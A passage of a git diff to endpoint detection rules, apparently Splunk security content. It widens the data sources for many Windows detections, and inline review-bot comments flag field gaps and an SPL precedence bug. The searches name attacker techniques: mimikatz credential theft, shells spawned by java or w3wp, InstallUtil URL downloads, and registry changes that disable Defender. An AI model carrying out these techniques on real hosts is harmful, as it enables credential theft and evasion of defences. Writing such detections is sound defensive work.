that disable Windows Defender's infection reporting. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
index e01d1f1143..fb4aeb7f7e 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable the Windows Defender Scan On Update feature. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
index cf9d08115b..103c913657 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable Windows Defender Signature Retirement. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml b/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
index db2f560571..bd97134d0a 100644
--- a/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
+++ b/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable the Windows Defender phishing filter. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml b/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
index 741c72ce63..1eaf1df99c 100644
--- a/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
+++ b/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that override the Windows Defender SmartScreen prompt. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml b/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
index d2d8e1b17b..f56729718e 100644
--- a/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
+++ b/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that set the Windows Defender SmartScreen level to "warn." This detection leverages
diff --git a/detections/endpoint/windows_impair_defenses_disable_hvci.yml b/detections/endpoint/windows_impair_defenses_disable_hvci.yml
index 74a15ee529..47402295cb 100644
--- a/detections/endpoint/windows_impair_defenses_disable_hvci.yml
+++ b/detections/endpoint/windows_impair_defenses_disable_hvci.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects the disabling of Hypervisor-protected
Code Integrity (HVCI) by monitoring changes in the Windows registry. It leverages
diff --git a/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml b/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
index e3649c03d7..5c325b9018 100644
--- a/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
+++ b/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the disabling of Windows Defender lo
making it harder to detect further malicious actions and maintain persistence on
the compromised endpoint.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Registry where (Registry.registry_path = "*WMI\\Autologger\\DefenderApiLogger\\Start"
diff --git a/detections/endpoint/windows_indicator_removal_via_rmdir.yml b/detections/endpoint/windows_indicator_removal_via_rmdir.yml
index d5143ea681..63df9d0661 100644
--- a/detections/endpoint/windows_indicator_removal_via_rmdir.yml
+++ b/detections/endpoint/windows_indicator_removal_via_rmdir.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the 'rmdir' command with
'/s' and '/q' options to delete files and directory trees. This detection leverages
data from Endpoint Detection and Response (EDR) agents, focusing on command-line
diff --git a/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml b/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
index b959dc3314..489dbe3794 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of programs initiated
compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*forfiles*
/c *" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml b/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
index cec4a83828..85a3095433 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
@@ -15,6 +15,8 @@ description: The following analytic detects programs initiated by pcalua.exe, th
environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*pcalua*
-a*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml b/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
index a5db471e72..219b7ab5a9 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the forfiles.exe
or further malicious actions.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_guid) as process_guid values(Processes.process_name) as
process_name count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
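Review bot: The newly listed `Windows Event Log Security 4688` source has no process GUID, yet this search aggregates `values(Processes.process_guid)` on the line above, so in environments that feed only 4688 that field comes back empty while the data_source list now claims coverage; as far as the standard Windows TA mapping goes, `process_guid` is populated from Sysmon-style sources only, which is worth confirming. The same field-level gap applies to `Processes.original_file_name` in the windows_information_discovery_fsutil and windows_mimikatz_binary_execution hunks further down, since Security 4688 records the image path and command line but not the original file name. Consider stating the caveat in `how_to_implement` (for example, "Security 4688 does not populate process_guid or original_file_name; those fields require Sysmon or an EDR source") or leaving 4688 out of lists for searches that depend on those fields. The `search` scalar continues past the end of this hunk.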
diff --git a/detections/endpoint/windows_information_discovery_fsutil.yml b/detections/endpoint/windows_information_discovery_fsutil.yml
index d49801f8b6..9955f3ce9d 100644
--- a/detections/endpoint/windows_information_discovery_fsutil.yml
+++ b/detections/endpoint/windows_information_discovery_fsutil.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows buil
and plan subsequent actions such as privilege escalation or persistence.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="fsutil.exe"
OR Processes.original_file_name = "fsutil.exe" AND Processes.process = "*fsinfo*"
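Review bot: The `where` clause on the two lines above mixes OR and AND without parentheses; since AND binds tighter than OR in SPL, it evaluates as `process_name="fsutil.exe" OR (original_file_name="fsutil.exe" AND process="*fsinfo*")`, so any fsutil.exe execution matches regardless of the `fsinfo` argument and the second branch is effectively dead. Grouping the name test, `where (Processes.process_name="fsutil.exe" OR Processes.original_file_name = "fsutil.exe") AND Processes.process = "*fsinfo*"`, restricts the match to the intended argument. This is pre-existing rather than introduced by the data_source change, but it is worth fixing while the file is touched; the `search` scalar continues outside the hunk.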
diff --git a/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml b/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
index 7a6841a325..a860417c29 100644
--- a/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
+++ b/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where the Windows Explo
system compromise and further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = explorer.exe
OR Processes.original_file_name = explorer.exe) AND NOT (Processes.parent_process_name
diff --git a/detections/endpoint/windows_installutil_in_non_standard_path.yml b/detections/endpoint/windows_installutil_in_non_standard_path.yml
index 758a320139..9e17deb2a9 100644
--- a/detections/endpoint/windows_installutil_in_non_standard_path.yml
+++ b/detections/endpoint/windows_installutil_in_non_standard_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of InstallUtil.exe fro
access or persist within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path
IN ("*\\Windows\\ADWS\\*","*\\Windows\\SysWOW64*", "*\\Windows\\system32*", "*\\Windows\\NetworkController\\*",
diff --git a/detections/endpoint/windows_installutil_remote_network_connection.yml b/detections/endpoint/windows_installutil_remote_network_connection.yml
index b8d6a4dd73..3e4ded5b5b 100644
--- a/detections/endpoint/windows_installutil_remote_network_connection.yml
+++ b/detections/endpoint/windows_installutil_remote_network_connection.yml
@@ -15,7 +15,7 @@ description: 'The following analytic detects the Windows InstallUtil.exe binary
network connections, and any associated file modifications to determine the legitimacy
of this activity.'
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_installutil` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
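Review bot: `Sysmon EventID 1 AND Sysmon EventID 3` packs two data sources into a single list entry, which diverges from the one-source-per-item form used by every other hunk in this change, and if contentctl resolves these strings by name against the objects under data_sources/ it will only validate when an object with exactly that compound name exists — worth confirming against the 4.2.0 schema. Listing them as `- Sysmon EventID 1` and `- Sysmon EventID 3` keeps the field machine-readable; if the intent is to say that both feeds are required for this search, that belongs in `how_to_implement` rather than in the identifier. The same shape appears in the windows_installutil_uninstall_option_with_network hunk and in windows_known_abused_dll_created, where two existing separate entries are collapsed into `Sysmon EventID 1 AND Sysmon EventID 11`.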
diff --git a/detections/endpoint/windows_installutil_uninstall_option.yml b/detections/endpoint/windows_installutil_uninstall_option.yml
index b9f187a954..0a704ec3ec 100644
--- a/detections/endpoint/windows_installutil_uninstall_option.yml
+++ b/detections/endpoint/windows_installutil_uninstall_option.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of the Windows InstallUtil.
within the environment.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_installutil` Processes.process
IN ("*/u*", "*uninstall*") NOT (Processes.process IN ("*C:\\WINDOWS\\CCM\\*")) NOT
diff --git a/detections/endpoint/windows_installutil_uninstall_option_with_network.yml b/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
index 39c7259c94..98edc863e1 100644
--- a/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
+++ b/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
@@ -14,7 +14,7 @@ description: 'The following analytic identifies the use of Windows InstallUtil.e
code, potentially leading to system compromise, data exfiltration, or further lateral
movement within the network.'
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_installutil` Processes.process IN ("*/u*", "*uninstall*") by _time
span=1h Processes.user Processes.process_id Processes.process_name Processes.dest
diff --git a/detections/endpoint/windows_installutil_url_in_command_line.yml b/detections/endpoint/windows_installutil_url_in_command_line.yml
index ca9b2147fd..9f30dd1f26 100644
--- a/detections/endpoint/windows_installutil_url_in_command_line.yml
+++ b/detections/endpoint/windows_installutil_url_in_command_line.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of Windows InstallUtil.exe
network connections, file modifications, and related processes for further investigation.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_installutil` Processes.process
IN ("*http://*","*https://*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_java_spawning_shells.yml b/detections/endpoint/windows_java_spawning_shells.yml
index 78910c722e..268a73b7d2 100644
--- a/detections/endpoint/windows_java_spawning_shells.yml
+++ b/detections/endpoint/windows_java_spawning_shells.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where java.exe or w3wp.
data exfiltration, or further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=java.exe
OR Processes.parent_process_name=w3wp.exe `windows_shells` by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_known_abused_dll_created.yml b/detections/endpoint/windows_known_abused_dll_created.yml
index b8eb9d459e..def54ea110 100644
--- a/detections/endpoint/windows_known_abused_dll_created.yml
+++ b/detections/endpoint/windows_known_abused_dll_created.yml
@@ -14,8 +14,7 @@ description: The following analytic identifies the creation of Dynamic Link Libr
could allow attackers to blend in with legitimate operations, posing a severe threat
to system integrity and security.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name!="unknown"
Processes.process_name=* Processes.process_guid!=null by _time span=1h Processes.dest
diff --git a/detections/endpoint/windows_lateral_tool_transfer_remcom.yml b/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
index 9996ac5ea4..196699eaeb 100644
--- a/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
+++ b/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the execution of RemCom.exe, an open-source
alternative to PsExec, used for lateral movement and remote command execution. It
leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_ldifde_directory_object_behavior.yml b/detections/endpoint/windows_ldifde_directory_object_behavior.yml
index a233880855..6e49a95030 100644
--- a/detections/endpoint/windows_ldifde_directory_object_behavior.yml
+++ b/detections/endpoint/windows_ldifde_directory_object_behavior.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the use of Ldifde.exe, a command-line
utility for creating, modifying, or deleting LDAP directory objects. This detection
leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml b/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
index 828e00bf9e..e63a6b0aae 100644
--- a/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
+++ b/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
related to the Local Security Authority (LSA) NoLMHash setting. It identifies when
diff --git a/detections/endpoint/windows_masquerading_explorer_as_child_process.yml b/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
index 6e1ff979c3..5450d746e5 100644
--- a/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
+++ b/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where explorer.exe is s
code, evade detection, and maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN("cmd.exe", "powershell.exe", "regsvr32.exe") AND Processes.process_name = "explorer.exe"
diff --git a/detections/endpoint/windows_masquerading_msdtc_process.yml b/detections/endpoint/windows_masquerading_msdtc_process.yml
index a71d52bf86..3331347e54 100644
--- a/detections/endpoint/windows_masquerading_msdtc_process.yml
+++ b/detections/endpoint/windows_masquerading_msdtc_process.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the execution of msdtc.exe with specific
command-line parameters (-a or -b), which are indicative of the PlugX malware. This
detection leverages data from Endpoint Detection and Response (EDR) agents, focusing
diff --git a/detections/endpoint/windows_mimikatz_binary_execution.yml b/detections/endpoint/windows_mimikatz_binary_execution.yml
index 2c3e806bab..5eed6aaa66 100644
--- a/detections/endpoint/windows_mimikatz_binary_execution.yml
+++ b/detections/endpoint/windows_mimikatz_binary_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the native mimik
to potential data breaches and system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=mimikatz.exe
OR Processes.original_file_name=mimikatz.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml b/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
index 28f8014766..69b3cf513b 100644
--- a/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
+++ b/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
key "AuthenticationLevelOverride" within the Terminal Server Client settings. It
diff --git a/detections/endpoint/windows_modify_registry_auto_minor_updates.yml b/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
index 2a72081010..f7134f4fb3 100644
--- a/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
+++ b/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Hunting
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic identifies a suspicious modification to the Windows
auto update configuration registry. It detects changes to the registry path
diff --git a/detections/endpoint/windows_modify_registry_auto_update_notif.yml b/detections/endpoint/windows_modify_registry_auto_update_notif.yml
index f88ce7e5aa..d0c1d43e7a 100644
--- a/detections/endpoint/windows_modify_registry_auto_update_notif.yml
+++ b/detections/endpoint/windows_modify_registry_auto_update_notif.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
registry that changes the auto-update notification setting to "Notify before download."
diff --git a/detections/endpoint/windows_modify_registry_default_icon_setting.yml b/detections/endpoint/windows_modify_registry_default_icon_setting.yml
index 6325f12c1a..034a6152ca 100644
--- a/detections/endpoint/windows_modify_registry_default_icon_setting.yml
+++ b/detections/endpoint/windows_modify_registry_default_icon_setting.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Wind
lead to system defacement and signal a broader ransomware attack, potentially compromising
sensitive data and system integrity.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime
max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml b/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
index b526a40c4a..649ccc3627 100644
--- a/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
+++ b/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
entry "DisableRestrictedAdmin," which controls the Restricted Admin mode behavior.
diff --git a/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml b/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
index 0c0d4cfcb6..7b6a0c6bfc 100644
--- a/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
+++ b/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
malicious, this action could allow attackers to operate undetected, leading to prolonged
persistence and potential further compromise of the system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled*"
diff --git a/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml b/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
index ca18f20edd..a168702d5e 100644
--- a/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
+++ b/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
to execute code, persist in the environment, and access sensitive information without
detection.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows
diff --git a/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml b/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
index 04af8a5dfd..9d55f54208 100644
--- a/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
+++ b/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious registry modification aimed
at disabling Windows Defender notifications. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml b/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
index 944bbb2aea..6a7e5cf8f8 100644
--- a/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
+++ b/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
undetected, potentially leading to further exploitation and compromise of the host
system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience*"
diff --git a/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml b/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
index 7b3ed78c86..6ec37a2410 100644
--- a/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
+++ b/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
key "DisableRemoteDesktopAntiAlias" with a value set to 0x00000001. This detection
diff --git a/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml b/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
index 51df5de3ed..df7bd7bf55 100644
--- a/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
+++ b/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
that disable security settings for Terminal Services. It leverages the Endpoint
diff --git a/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml b/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
index d26073ec5f..b3d1d4f59c 100644
--- a/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
+++ b/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications in the Windows registr
If confirmed malicious, this could allow attackers to operate undetected, potentially
leading to prolonged persistence and further exploitation within the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\Windows
diff --git a/detections/endpoint/windows_modify_registry_disallow_windows_app.yml b/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
index 7fa3ba2780..22d3783127 100644
--- a/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
+++ b/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the Windows registr
malicious, this could allow an attacker to evade detection and maintain persistence
on the compromised host.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun*"
diff --git a/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml b/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
index e165e8ebe5..71bd681e79 100644
--- a/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
+++ b/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
registry that disables automatic updates. It leverages data from the Endpoint datamodel,
diff --git a/detections/endpoint/windows_modify_registry_dontshowui.yml b/detections/endpoint/windows_modify_registry_dontshowui.yml
index 6f4f26d691..5264f4251f 100644
--- a/detections/endpoint/windows_modify_registry_dontshowui.yml
+++ b/detections/endpoint/windows_modify_registry_dontshowui.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows Error Reporting
registry key "DontShowUI" to suppress error reporting dialogs. It leverages data
diff --git a/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml b/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
index c57b4e44ec..49e5c60bf6 100644
--- a/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
+++ b/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
registry setting for EnableLinkedConnections. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_longpathsenabled.yml b/detections/endpoint/windows_modify_registry_longpathsenabled.yml
